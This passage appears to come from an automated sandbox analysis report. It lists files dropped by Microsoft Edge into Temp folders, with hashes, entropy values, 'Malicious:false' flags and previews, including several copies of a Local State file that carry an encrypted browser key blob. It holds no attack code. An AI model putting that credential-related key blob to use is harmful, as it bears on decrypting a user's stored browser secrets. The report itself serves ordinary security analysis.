                                                                                                                                                                                                                                                                                                        SHA-256:9E05C02452200ED3DA38172FCCA9A736C7499D7DFD7FC749D91195EA5DCAB658
                                                                                                                                                                                                                                                                                                        SHA-512:9EF5EE3278C2A7B4FF09CAD9D36D24CB3F30F4198A95D242BFD6F958CD8E1FFC9D47A93D103ECFFCC5FA9FE9133AF14F6CB593C8E8629F4D6EC233F13A5B2856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABsqr4+TsbgRqQiJnqCfDkREAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACb1dY6/QNIt1CbsfkuTHPDCc/qEvSXgoyKuCXqsA61uQAAAAAOgAAAAAIAACAAAABdbDvLibb31MTMNHENmFSH6Ad0ilzZGnoIfAGNCw+iGjAAAADTJOjYM3rTc5GL8TSDW9iyqPYLoEyk4qkeP5HGVhhbJO8sQBy1oV4h3v1alFi/JK1AAAAAvc1mUFcSwcXfdNd47XC8+1kT7z4VHksXxgDNSoQvs/cnwP1Fyw95uH3ZfK5xUCZqNzGllQeYu6EQqzyyD3O5KA=="},"profile":{"info_cache":{},"profile_counts_reported":"13379003728423031","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734530126"},"user_experienc

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\chr1078.tmp\BrowserMetrics\BrowserMetrics-6762D44E-1CC8.pma

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0400661317802743
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:2JOUjLYiVWK+ggCNlHgJZzK1d9XONY1Pg+znhXJBVEKWh8RQJul7Z7Nn8y08TcmQ:oOUjjl8cM58hZMwtZR08T2RGOD
                                                                                                                                                                                                                                                                                                        MD5:87D34C38658230A4DC164A50F6FD45C5
                                                                                                                                                                                                                                                                                                        SHA1:37AA64894B5AD790CE36B5715FFF4D2FBC620C91
                                                                                                                                                                                                                                                                                                        SHA-256:B94D5B50C31F8C649986A596C330A9880D4D3B97EDA144D143B0C2C7F1E14270
                                                                                                                                                                                                                                                                                                        SHA-512:133ACA0BFE81D76592AE6A3C786E2D1C010428473877DB5EC433509B84EB0EEE0FB98EBD781AA00716F6B665839ED8E22A9CB51CFCB0D7A7D6E582147AA76667
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...@..@...@.....C.].....@...............x`..0P..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....}.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".atfnbn20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@.............$........................<.w..U..d.y.oK.>.........."....."...2...".*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....S..L@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...............................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\chr1078.tmp\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.7447980503789413
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:FiWWltlT/KzmQf7tDdRbO/TgEQ+SYHt:o1zKzPf7XRbO/05+Sat
                                                                                                                                                                                                                                                                                                        MD5:3013395A0E096FBB856EAEC2D8CDC7BA
                                                                                                                                                                                                                                                                                                        SHA1:6997ECB8123E102139F0B02FDE2044FA343E462B
                                                                                                                                                                                                                                                                                                        SHA-256:E8AE2A9ABAB622D2354C550C908A4B5EB64AAD36E5F3CA5525C83D0C3996564C
                                                                                                                                                                                                                                                                                                        SHA-512:87295AA9D813CEE533781058AB7A65FD7163D0C118AB2663615397746E1B07A48FC721B39A5405907D121386D24C1D61A1DC91779A489D10F0DDE32091187AF5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:sdPC...........................C.d.?..xz................................................................................................................................................................................................5c844288-0a30-41b6-8a5d-dad9b9950ad2............

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\chr1078.tmp\Crashpad\throttle_store.dat

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):20
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.6219280948873624
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                                                                                                                                                                                                                        MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                                                                                                                                                                                                                        SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                                                                                                                                                                                                                        SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                                                                                                                                                                                                                        SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:level=none expiry=0.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\chr1078.tmp\Last Version

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                        MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                        SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                        SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                        SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\chr1078.tmp\Local State (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1371
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.548723940528337
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YpQBqDPak7u5rrtneCCMGDDRgvfyikHxJdXBuBuwBcaCz5Nh+V9XJJQQRCYfYg:YuBqDPafrCRDR8j4gBzBcP5+V95eB0
                                                                                                                                                                                                                                                                                                        MD5:998F4B14DC7CE34A564468858883C72F
                                                                                                                                                                                                                                                                                                        SHA1:23BE915868DFE148573B3A572874146376222565
                                                                                                                                                                                                                                                                                                        SHA-256:9E05C02452200ED3DA38172FCCA9A736C7499D7DFD7FC749D91195EA5DCAB658
                                                                                                                                                                                                                                                                                                        SHA-512:9EF5EE3278C2A7B4FF09CAD9D36D24CB3F30F4198A95D242BFD6F958CD8E1FFC9D47A93D103ECFFCC5FA9FE9133AF14F6CB593C8E8629F4D6EC233F13A5B2856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABsqr4+TsbgRqQiJnqCfDkREAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACb1dY6/QNIt1CbsfkuTHPDCc/qEvSXgoyKuCXqsA61uQAAAAAOgAAAAAIAACAAAABdbDvLibb31MTMNHENmFSH6Ad0ilzZGnoIfAGNCw+iGjAAAADTJOjYM3rTc5GL8TSDW9iyqPYLoEyk4qkeP5HGVhhbJO8sQBy1oV4h3v1alFi/JK1AAAAAvc1mUFcSwcXfdNd47XC8+1kT7z4VHksXxgDNSoQvs/cnwP1Fyw95uH3ZfK5xUCZqNzGllQeYu6EQqzyyD3O5KA=="},"profile":{"info_cache":{},"profile_counts_reported":"13379003728423031","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734530126"},"user_experienc

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\chr1078.tmp\Local State~RF2e16d.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1371
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.548723940528337
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YpQBqDPak7u5rrtneCCMGDDRgvfyikHxJdXBuBuwBcaCz5Nh+V9XJJQQRCYfYg:YuBqDPafrCRDR8j4gBzBcP5+V95eB0
                                                                                                                                                                                                                                                                                                        MD5:998F4B14DC7CE34A564468858883C72F
                                                                                                                                                                                                                                                                                                        SHA1:23BE915868DFE148573B3A572874146376222565
                                                                                                                                                                                                                                                                                                        SHA-256:9E05C02452200ED3DA38172FCCA9A736C7499D7DFD7FC749D91195EA5DCAB658
                                                                                                                                                                                                                                                                                                        SHA-512:9EF5EE3278C2A7B4FF09CAD9D36D24CB3F30F4198A95D242BFD6F958CD8E1FFC9D47A93D103ECFFCC5FA9FE9133AF14F6CB593C8E8629F4D6EC233F13A5B2856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABsqr4+TsbgRqQiJnqCfDkREAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACb1dY6/QNIt1CbsfkuTHPDCc/qEvSXgoyKuCXqsA61uQAAAAAOgAAAAAIAACAAAABdbDvLibb31MTMNHENmFSH6Ad0ilzZGnoIfAGNCw+iGjAAAADTJOjYM3rTc5GL8TSDW9iyqPYLoEyk4qkeP5HGVhhbJO8sQBy1oV4h3v1alFi/JK1AAAAAvc1mUFcSwcXfdNd47XC8+1kT7z4VHksXxgDNSoQvs/cnwP1Fyw95uH3ZfK5xUCZqNzGllQeYu6EQqzyyD3O5KA=="},"profile":{"info_cache":{},"profile_counts_reported":"13379003728423031","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734530126"},"user_experienc

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\chr1078.tmp\Local State~RF2e1cb.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1371
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.548723940528337
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YpQBqDPak7u5rrtneCCMGDDRgvfyikHxJdXBuBuwBcaCz5Nh+V9XJJQQRCYfYg:YuBqDPafrCRDR8j4gBzBcP5+V95eB0
                                                                                                                                                                                                                                                                                                        MD5:998F4B14DC7CE34A564468858883C72F
                                                                                                                                                                                                                                                                                                        SHA1:23BE915868DFE148573B3A572874146376222565
                                                                                                                                                                                                                                                                                                        SHA-256:9E05C02452200ED3DA38172FCCA9A736C7499D7DFD7FC749D91195EA5DCAB658
                                                                                                                                                                                                                                                                                                        SHA-512:9EF5EE3278C2A7B4FF09CAD9D36D24CB3F30F4198A95D242BFD6F958CD8E1FFC9D47A93D103ECFFCC5FA9FE9133AF14F6CB593C8E8629F4D6EC233F13A5B2856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABsqr4+TsbgRqQiJnqCfDkREAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACb1dY6/QNIt1CbsfkuTHPDCc/qEvSXgoyKuCXqsA61uQAAAAAOgAAAAAIAACAAAABdbDvLibb31MTMNHENmFSH6Ad0ilzZGnoIfAGNCw+iGjAAAADTJOjYM3rTc5GL8TSDW9iyqPYLoEyk4qkeP5HGVhhbJO8sQBy1oV4h3v1alFi/JK1AAAAAvc1mUFcSwcXfdNd47XC8+1kT7z4VHksXxgDNSoQvs/cnwP1Fyw95uH3ZfK5xUCZqNzGllQeYu6EQqzyyD3O5KA=="},"profile":{"info_cache":{},"profile_counts_reported":"13379003728423031","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734530126"},"user_experienc

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\chr1078.tmp\Variations

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):85
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQan:YQ3Kq9X0dMgAEiLIM
                                                                                                                                                                                                                                                                                                        MD5:BC6142469CD7DADF107BE9AD87EA4753
                                                                                                                                                                                                                                                                                                        SHA1:72A9AA05003FAB742B0E4DC4C5D9EDA6B9F7565C
                                                                                                                                                                                                                                                                                                        SHA-256:B26DA4F8C7E283AA74386DA0229D66AF14A37986B8CA828E054FC932F68DD557
                                                                                                                                                                                                                                                                                                        SHA-512:47D1A67A16F5DC6D50556C5296E65918F0A2FCAD0E8CEE5795B100FE8CD89EAF5E1FD67691E8A57AF3677883A5D8F104723B1901D11845B286474C8AC56F6182
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":0}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1420
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.393643543873903
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YGgw50Mue0vMi5aGc59aI0xs5BYX0f8H5pRhRUj0Wphx5SVr80Kzxv5M:YGgw50MF0vMi5aGc59aI0xs5BO0f05LL
                                                                                                                                                                                                                                                                                                        MD5:37B3D67F798643C17A2FD47F35668F29
                                                                                                                                                                                                                                                                                                        SHA1:8D4C3E1FFF4F2F9F3E47795550B173D9F34203C5
                                                                                                                                                                                                                                                                                                        SHA-256:59B58874D1A0209137B95A7A8F13944BAFC48D9D32252B2FE71715E407E0A203
                                                                                                                                                                                                                                                                                                        SHA-512:3A6CE4381C7402A3F1410BC8DCB63BC03FAD1E8777428E0CB4C9BBC393F4BDB01E335BA679198DAEC88825D0C893461A04A896FAD2A390CFF8F40440C3BCA404
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"logTime": "1005/105557", "correlationVector":"IhwEFhHe1RCLbT1FQv/Ae0","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/105558", "correlationVector":"57761A34EFC64D3D925ED8A5BDB16EC4","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/105558", "correlationVector":"XmF4rJWUxa+a0S8KiTzuSi","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/110506", "correlationVector":"RUEKzvGjkNy28IkhpSYjUT","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/110507", "correlationVector":"908AB9CF10A04EEBB546EA86CCC2D75C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/110612", "correlationVector":"cIZRk+6N+6j8nraOt6/zBX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/110613", "correlationVector":"24FC3F60363640349D28C611916C70BE","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/110742", "correlationVector":"9q1Nr5/Hy+Ch3gwSLtcPX1","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/110743", "correlationVector":"6476C2A6

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ef181bf2-795b-434f-8140-8c7585a20102.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4982
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                        MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                        SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                        SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                        SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):908
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                        MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                        SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                        SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                        SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1285
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                        MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                        SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                        SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                        SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1244
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                        MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                        SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                        SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
